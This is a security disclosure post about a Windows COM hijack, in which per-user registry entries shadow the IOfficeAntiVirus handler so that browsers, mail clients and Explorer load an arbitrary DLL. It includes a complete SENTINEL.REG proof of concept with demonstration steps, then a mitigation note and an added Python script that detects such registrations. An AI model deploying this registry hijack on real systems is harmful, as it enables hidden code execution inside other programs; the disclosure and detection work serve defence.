Hi @ll,

this is the continuation of the previous posts and .

(Un)fortunately the IOfficeAntiVirus interface (see ) has at least one other weakness which also allows (unprivileged) users to load arbitrary DLLs into web browsers, mail/news clients, instant messengers, the file explorer and every other program which calls this COM interface.

With Windows 2000, Microsoft introduced the "merged view" of the [HKEY_CLASSES_ROOT] virtual registry tree: see

"Thanks" to this feature, COM categories/classes/interfaces registered by (unprivileged) users below [HKEY_CURRENT_USER\Software\Classes] obscure the corresponding COM categories/classes/interfaces registered (by administrators) below [HKEY_LOCAL_MACHINE\SOFTWARE\Classes].

Demonstration:
~~~~~~~~~~~~~~

On a 32-bit installation of Windows XP SP2 or any newer version of Windows perform the following steps (adaptation for 64-bit installations is left as an exercise to the reader):

1. Log on to an arbitrary (unprivileged) user account.

2. Download and save it in an arbitrary directory.

3. Create a text file SENTINEL.REG with the following contents:

--- SENTINEL.REG ---
REGEDIT4

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
@="Vulnerability and Exploit Detector"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="MSOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
@="\\SENTINEL.DLL" ; replace with the directory used in step 2.
"ThreadingModel"="Both"

; NOTE: the following entries are optional!

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\TreatAs]
@="{56FFCC31-D398-11D0-B2AE-00A0C908FA49}"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\BaseInterface]
@="{00000000-0000-0000-C000-000000000046}" ; IUnknown

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\NumMethods]
@="4"
--- EOF ---

4. Double-click the file SENTINEL.REG to merge it into the user's registry.

5. Download an arbitrary file with your web browser, for example , or save an attachment in your mail client, and notice the message boxes displayed from the sentinels.

NOTE: the batch script performs all these steps on 32-bit and 64-bit installations of Windows XP and newer versions of Windows.

Mitigation:
~~~~~~~~~~~

Use AppLocker or SAFER alias Software Restriction Policies: see

stay tuned, and NEVER use Windows without SAFER or AppLocker
Stefan Kanthak
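The per-user registration shown above is exactly what an administrator or incident responder wants to find: a CLSID below HKEY_CURRENT_USER\Software\Classes that claims the MSOfficeAntiVirus category and points InProcServer32 at a DLL outside the system directories. The following script is an added example, not part of the original post or of any of its referenced tools. It parses a Registry Editor export (REGEDIT4 or "Windows Registry Editor Version 5.00" text, such as the output of `reg export HKCU\Software\Classes\CLSID`) and reports every such registration, the server DLL it would load, and any other CLSIDs redirected to it via TreatAs. The category GUID is the one from the post; the sample .reg text with the path C:\Users\alice\Downloads\SENTINEL.DLL is constructed for the demonstration.

```python
"""Audit a .reg export for per-user COM classes that register the MSOfficeAntiVirus
category, i.e. classes that IOfficeAntiVirus callers would load from HKEY_CURRENT_USER
ahead of the machine-wide registration. Added example; not code from the original post."""

# Category ID that IOfficeAntiVirus callers enumerate (taken from the post).
MSOFFICE_ANTIVIRUS_CATID = "{56FFCC30-D398-11D0-B2AE-00A0C908FA49}"
# Key prefix of per-user CLSID registrations, upper-cased for case-insensitive matching.
HKCU_CLSID = "HKEY_CURRENT_USER\\SOFTWARE\\CLASSES\\CLSID\\"


def _strip_comment(line):
    """Drop a ';' comment that sits outside a double-quoted string."""
    in_quotes, escaped = False, False
    for i, ch in enumerate(line):
        if escaped:
            escaped = False
        elif ch == "\\" and in_quotes:
            escaped = True          # next character is escaped (\\ or \")
        elif ch == '"':
            in_quotes = not in_quotes
        elif ch == ";" and not in_quotes:
            return line[:i]
    return line


def _unquote(value):
    """Turn a REG string literal ("...", with \\ and \" escapes) into its value;
    non-string data (dword:, hex:) is returned unchanged."""
    value = value.strip()
    if len(value) >= 2 and value[0] == value[-1] == '"':
        return value[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return value


def parse_reg(text):
    """Parse REGEDIT4 / 'Windows Registry Editor Version 5.00' text into
    {KEY (upper-cased): {value name: data}}; the '@' default value becomes '(default)'."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = _strip_comment(raw).strip()
        if not line or line.startswith(("REGEDIT", "Windows Registry Editor")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].upper()
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")
        name = "(default)" if name.strip() == "@" else _unquote(name)
        keys[current][name] = _unquote(data)
    return keys


def find_user_antivirus_handlers(keys):
    """Report every CLSID below HKCU\\Software\\Classes that claims the MSOfficeAntiVirus
    category, the in-process server it would load, and CLSIDs redirected to it via TreatAs."""
    findings = []
    for key in keys:
        parts = key.split("\\")
        # HKEY_CURRENT_USER\SOFTWARE\CLASSES\CLSID\{clsid}\IMPLEMENTED CATEGORIES\{catid}
        if (len(parts) == 7 and key.startswith(HKCU_CLSID)
                and parts[5] == "IMPLEMENTED CATEGORIES"
                and parts[6] == MSOFFICE_ANTIVIRUS_CATID):
            clsid = parts[4]
            server = keys.get(HKCU_CLSID + clsid + "\\INPROCSERVER32", {})
            redirected = sorted(
                k.split("\\")[4] for k, v in keys.items()
                if k.startswith(HKCU_CLSID) and k.endswith("\\TREATAS")
                and v.get("(default)", "").upper() == clsid)
            findings.append({
                "clsid": clsid,
                "server": server.get("(default)"),
                "threading_model": server.get("ThreadingModel"),
                "redirected_from": redirected,
            })
    return findings


def audit(text):
    """Convenience wrapper: parse a .reg export and return the findings list."""
    return find_user_antivirus_handlers(parse_reg(text))


# Constructed sample modelled on the post's SENTINEL.REG; the DLL path is made up.
SAMPLE_REG = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
@="Vulnerability and Exploit Detector"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="MSOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
@="C:\\Users\\alice\\Downloads\\SENTINEL.DLL" ; constructed path
"ThreadingModel"="Both"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\TreatAs]
@="{56FFCC31-D398-11D0-B2AE-00A0C908FA49}"
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_REG):
        print(f"per-user MSOfficeAntiVirus handler {f['clsid']} -> {f['server']} "
              f"(ThreadingModel={f['threading_model']}, TreatAs from {f['redirected_from']})")
```

Any hit is worth a look, since a legitimate antivirus product registers its IOfficeAntiVirus handler below HKEY_LOCAL_MACHINE; a server path under a user profile directory is the strongest signal. The same parser can be pointed at a full HKCU\Software\Classes export to find other per-user shadowing of machine-wide classes by comparing the CLSIDs it lists against those below HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID.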